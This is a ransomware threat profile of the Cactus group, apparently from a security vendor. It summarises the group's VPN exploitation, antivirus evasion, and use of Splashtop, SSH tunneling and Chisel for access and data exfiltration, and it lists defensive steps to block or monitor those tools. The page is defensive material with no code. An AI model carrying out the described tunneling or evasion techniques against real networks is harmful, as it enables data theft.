Ransomware Group
Cactus
Also known as: Cactus Ransomware
Status: active • First seen 2023-03 • 150+ known victims
Cactus ransomware is sneaky. Their main trick is that the ransomware encrypts itself before running, so antivirus can't recognize it as malicious. They get in through vulnerable VPNs (especially Fortinet) and use legitimate IT tools to move around your network. By the time you notice, they've already stolen your data.
Overview
Cactus is a sophisticated ransomware operation known for exploiting VPN vulnerabilities to gain initial access. What makes Cactus unique is that their ransomware binary encrypts itself to evade antivirus detection. They also use legitimate tools for persistence and lateral movement.
Target Industries
Manufacturing, Professional Services, Technology, Retail, Healthcare, Energy
How They Attack
- • Exploiting Fortinet VPN vulnerabilities
- • Using self-encrypting ransomware binary
- • Splashtop for remote access
- • SSH tunneling for data exfiltration
- • Using Chisel for network tunneling
Notable Victims
Schneider Electric (2024), Various manufacturing companies, Multiple professional services firms, Several technology companies
Is your business exposed?
How to Protect Against Cactus
- 1.
Patch Fortinet VPN devices immediately (CVE-2023-27997, etc.)
- 2.
Monitor for unauthorized Splashtop installations
- 3.
Block SSH tunneling from non-authorized systems
- 4.
Deploy EDR with memory scanning capabilities
- 5.
Monitor for Chisel tool usage on network
MITRE ATT&CK Techniques
Is your business exposed?
Check if your company data is circulating on the dark web
Free scan • No credit card required